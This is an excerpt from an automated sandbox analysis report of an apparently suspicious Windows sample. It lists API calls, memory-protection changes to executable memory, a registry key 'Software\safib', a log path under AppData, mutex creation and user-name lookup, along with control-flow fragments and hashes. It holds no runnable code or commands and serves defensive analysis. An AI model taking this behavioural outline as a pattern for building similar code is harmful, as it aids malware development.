                                                                                                                                            • StrRStrIA.SHELL32(?,00000000,07002F39), ref: 07002F7B
                                                                                                                                            • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 07002FA4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID: C:\Users\user\AppData\Roaming\template\$\log\
                                                                                                                                            • API String ID: 823142352-3936820877
                                                                                                                                            • Opcode ID: 5734137e3d3e21c1bc9ea989c35cfe801174d94c5b249ccbd59912fe7aa57b60
                                                                                                                                            • Instruction ID: 807962b1c990f07df1a7f3e771873767bc626c8793085e9261e2b6c66e2396bc
                                                                                                                                            • Opcode Fuzzy Hash: 5734137e3d3e21c1bc9ea989c35cfe801174d94c5b249ccbd59912fe7aa57b60
                                                                                                                                            • Instruction Fuzzy Hash: 17F0F47124420ABFDF114F55DC49FA93FA6BB187B4F004324B915541E0D77AC560DBD0

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • lstrcmp.KERNEL32(?,070025FE), ref: 07002601
                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 07002654
                                                                                                                                            • FindClose.KERNEL32(?), ref: 07002670
                                                                                                                                              • Part of subcall function 07002613: lstrcmp.KERNEL32(?,07002610), ref: 07002614
                                                                                                                                              • Part of subcall function 07002613: lstrcat.KERNEL32(?,?), ref: 0700262F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Findlstrcmp$CloseFileNextlstrcat
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 360925478-0

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$CloseFileNextlstrcatlstrcmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 122021188-0
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 07003539
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open
                                                                                                                                            • String ID: Software\safib$\ast\SS
                                                                                                                                            • API String ID: 71445658-1250085753

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000005,00003000,00000040,07003327,07006D71,00000000,Tjs,07003015,07006D21,00000000,07002DCF), ref: 07002E78
                                                                                                                                            • VirtualProtect.KERNEL32(?,00000005,00000040,00000000), ref: 07002EFB
                                                                                                                                            • VirtualProtect.KERNEL32(?,00000005,00000000,00000000), ref: 07002F1F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$Protect$Alloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2541858876-0
                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000005,00003000,00000040,07003327,07006D71,00000000,Tjs,07003015,07006D21,00000000,07002DCF), ref: 07002E78
                                                                                                                                            • VirtualProtect.KERNEL32(?,00000005,00000040,00000000), ref: 07002EFB
                                                                                                                                            • VirtualProtect.KERNEL32(?,00000005,00000000,00000000), ref: 07002F1F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$Protect$Alloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2541858876-0

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0700214A
                                                                                                                                            • CreateFileMappingA.KERNEL32(?,00000000,01000002,00000000,00000000,00000000), ref: 0700215E
                                                                                                                                            • MapViewOfFileEx.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 07002172
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Create$MappingView
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1299149932-0
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0700214A
                                                                                                                                            • CreateFileMappingA.KERNEL32(?,00000000,01000002,00000000,00000000,00000000), ref: 0700215E
                                                                                                                                            • MapViewOfFileEx.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 07002172
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Create$MappingView
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1299149932-0
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 07002FA4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID: \log\
                                                                                                                                            • API String ID: 823142352-1104933326
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 0700300A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID: .log
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open
                                                                                                                                            • String ID: Software\safib
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 070010AD
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 07001111
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateFileHandle
                                                                                                                                            • String ID:

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 93 7004ca3-7004cdf RegOpenKeyExW 94 7004ce1-7004d01 RegQueryValueExW 93->94 95 7004d1f-7004d25 93->95 94->95 96 7004d03-7004d1a 94->96 96->95
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,00000000), ref: 07004CDA
                                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,?,00000000,00000000,00000000,00000400), ref: 07004CFC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: OpenQueryValue
                                                                                                                                            • String ID:
                                                                                                                                            APIs
                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 07002654
                                                                                                                                            • FindClose.KERNEL32(?), ref: 07002670
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$CloseFileNext
                                                                                                                                            • String ID:
                                                                                                                                            APIs
                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 07002654
                                                                                                                                            • FindClose.KERNEL32(?), ref: 07002670
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$CloseFileNext
                                                                                                                                            • String ID:

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 98 7002196-70021a0 99 70021a2-70021a6 98->99 100 70021de-70021e0 98->100 99->100 101 70021a8-70021cf UnmapViewOfFile CloseHandle 99->101 102 70021d4-70021d8 101->102 102->100
                                                                                                                                            APIs
                                                                                                                                            • UnmapViewOfFile.KERNEL32(?), ref: 070021AB
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 070021C0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseFileHandleUnmapView
                                                                                                                                            • String ID:
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(?), ref: 07001E00
                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 07001E16
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleLibraryLoadModule
                                                                                                                                            • String ID:

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 116 7004df8-7004e66 call 7004e57 120 7004ec5-7004ed1 116->120 121 7004e68-7004e70 116->121 121->120 123 7004e72-7004e79 call 7004d26 121->123 123->120 126 7004e7b-7004eac call 7004c14 VirtualProtect call 7004a59 123->126 126->120 131 7004eae-7004ebb call 700279f call 7002c61 126->131 135 7004ec0-7004ec4 131->135
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                            • String ID:

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 136 7004e57-7004e66 138 7004ec5-7004ed1 136->138 139 7004e68-7004e70 136->139 139->138 141 7004e72-7004e79 call 7004d26 139->141 141->138 144 7004e7b-7004eac call 7004c14 VirtualProtect call 7004a59 141->144 144->138 149 7004eae-7004ec4 call 700279f call 7002c61 144->149
                                                                                                                                            APIs
                                                                                                                                            • VirtualProtect.KERNEL32(07001120,00003939,00000040,?), ref: 07004EA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                            • Opcode ID: 8f4fb6054a2c8c138d2226a736fc9a64ec46a0251527cf4f42ef7614769928d0
                                                                                                                                            • Instruction ID: d50483087ab37230a7225d39757434d6490ea0515efff2566991c5943957ae2a
                                                                                                                                            • Opcode Fuzzy Hash: 8f4fb6054a2c8c138d2226a736fc9a64ec46a0251527cf4f42ef7614769928d0
                                                                                                                                            • Instruction Fuzzy Hash: 110162F1600356AEF710ABB48D85FEF23A9AF45765F004711B7009A1C4DAB4E50146E5
                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExA.USER32(00000000,07006028,07006028,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 07001058
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                            • Opcode ID: 326d33d4fe567c4ee37aedd430c8ce1c66cee96bd095d3c8ed72511f5beca70d
                                                                                                                                            • Instruction ID: 7708f8f6e389550fca1d9837e488f03c923586984dfaede3114fcb2497580f86
                                                                                                                                            • Opcode Fuzzy Hash: 326d33d4fe567c4ee37aedd430c8ce1c66cee96bd095d3c8ed72511f5beca70d
                                                                                                                                            • Instruction Fuzzy Hash: 57F01C752C0605EBE7601B40EC1BF463AE2FB09732F028314F615D80D0CABE50749BC5
                                                                                                                                            APIs
                                                                                                                                            • CreateMutexA.KERNEL32(?,?), ref: 070031AA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutex
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                            • Opcode ID: ea62bc9f67203216ddf277cd4229ce3317335629c4f8318c7608a948f3e45a12
                                                                                                                                            • Instruction ID: fd03893b3fd632033e29702c4899d578fd5279aeb1bfc82a12f470e803a11b86
                                                                                                                                            • Opcode Fuzzy Hash: ea62bc9f67203216ddf277cd4229ce3317335629c4f8318c7608a948f3e45a12
                                                                                                                                            • Instruction Fuzzy Hash: A5E01BF55051119FFB121F70DC09BDABBD4EF05271F054614E506D5190DF3DC51086D5

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 154 7002768-700279e SetErrorMode
                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 0700279A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                            • Opcode ID: c58ceb7cd71fa60720208bd4347a179cd5e4d5d9cc5231270b77cadf24cfb49e
                                                                                                                                            • Instruction ID: 699a024e0a5c613f804c23b7aadae925edf8aa6ef2238e220b035148e43530c8
                                                                                                                                            • Opcode Fuzzy Hash: c58ceb7cd71fa60720208bd4347a179cd5e4d5d9cc5231270b77cadf24cfb49e
                                                                                                                                            • Instruction Fuzzy Hash: 84E0ECB1D01308EFDB51DFA4D60978DB7F1BB10318F6181A4C44163244EB79AF08AB41
                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 0700279A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                            • Opcode ID: c58ceb7cd71fa60720208bd4347a179cd5e4d5d9cc5231270b77cadf24cfb49e
                                                                                                                                            • Instruction ID: 699a024e0a5c613f804c23b7aadae925edf8aa6ef2238e220b035148e43530c8
                                                                                                                                            • Opcode Fuzzy Hash: c58ceb7cd71fa60720208bd4347a179cd5e4d5d9cc5231270b77cadf24cfb49e
                                                                                                                                            • Instruction Fuzzy Hash: 84E0ECB1D01308EFDB51DFA4D60978DB7F1BB10318F6181A4C44163244EB79AF08AB41
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 07003539
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                            • Opcode ID: 482da8c995a4f74d02ecc4b3aceeacf32f7d25aa07a4e6a1e4d0a05bffc6e07f
                                                                                                                                            • Instruction ID: 1f33008c8bf41afde646084074871675b8ea1baf774dc2724effeb485a5af6f5
                                                                                                                                            • Opcode Fuzzy Hash: 482da8c995a4f74d02ecc4b3aceeacf32f7d25aa07a4e6a1e4d0a05bffc6e07f
                                                                                                                                            • Instruction Fuzzy Hash: EBD092B200010AEBDF025F54EC8A8DE3E6AFB0A395F115505F90654021D77BC571ABA1
                                                                                                                                            APIs
                                                                                                                                            • CreateMutexA.KERNEL32(?,?), ref: 070031AA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutex
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                            • Opcode ID: 448c5d0f5f0344c08cb0f611ebd8f33d755b618d42bf3010e55dd722cc54bf3d
                                                                                                                                            • Instruction ID: ca6d4aa422b7dc9f5185f62696ddfbf57a39a770fb1c82f4672e809bb94d1ce7
                                                                                                                                            • Opcode Fuzzy Hash: 448c5d0f5f0344c08cb0f611ebd8f33d755b618d42bf3010e55dd722cc54bf3d
                                                                                                                                            • Instruction Fuzzy Hash: 28D0C972604115ABDF126F94AC49A8A7FE5EF153A5B004525E50588151EB3A82308BD0
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,?), ref: 07001EFC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                            • Opcode ID: 5c0b6406230129fe6de1bdb2932368622c490ba868e862f5fe96a86c99ba5a7e
                                                                                                                                            • Instruction ID: 077e9be4a8c3806ddc56d2593dec91f432b289fdf0e99c17d710720efc5b52d9
                                                                                                                                            • Opcode Fuzzy Hash: 5c0b6406230129fe6de1bdb2932368622c490ba868e862f5fe96a86c99ba5a7e
                                                                                                                                            • Instruction Fuzzy Hash: 0FD01235540208BBEB11EB949C07F897B75A748B14F508110B705580D096B4A628DBD5

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 155 70021ff-700221a GetUserNameA
                                                                                                                                            APIs
                                                                                                                                            • GetUserNameA.ADVAPI32(00000400,00000400), ref: 07002213
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2863794772.0000000007002000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2863732421.0000000007000000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2863935185.0000000007004000.00000080.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864524830.0000000007005000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864616357.0000000007006000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864659717.0000000007007000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                            • Associated: 0000000B.00000002.2864694582.0000000007008000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: NameUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                            • Opcode ID: e8fe1bac36dbdb6a1b6b5f752de825343a0cede534e44747f09e6a20301a06c7
                                                                                                                                            • Instruction ID: 296470ea2d1905e73cca287aa37e26fdfe67e2562d18cc4f69aa6f6bc27716d3
                                                                                                                                            • Opcode Fuzzy Hash: e8fe1bac36dbdb6a1b6b5f752de825343a0cede534e44747f09e6a20301a06c7
                                                                                                                                            • Instruction Fuzzy Hash: 52C08CB040020DFBDF00EF90E90A89D7BB8AB80348F0081A4E60166044DBB8AB0ADBD1
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmp, Offset: 07001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_3_7001000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_value_int.SQLITE3 ref: 61E23C8B
                                                                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 61E23CAB
                                                                                                                                            • sqlite3_value_blob.SQLITE3 ref: 61E23CB8
                                                                                                                                            • sqlite3_value_text.SQLITE3 ref: 61E23CCF
                                                                                                                                            • sqlite3_value_int.SQLITE3 ref: 61E23D1F
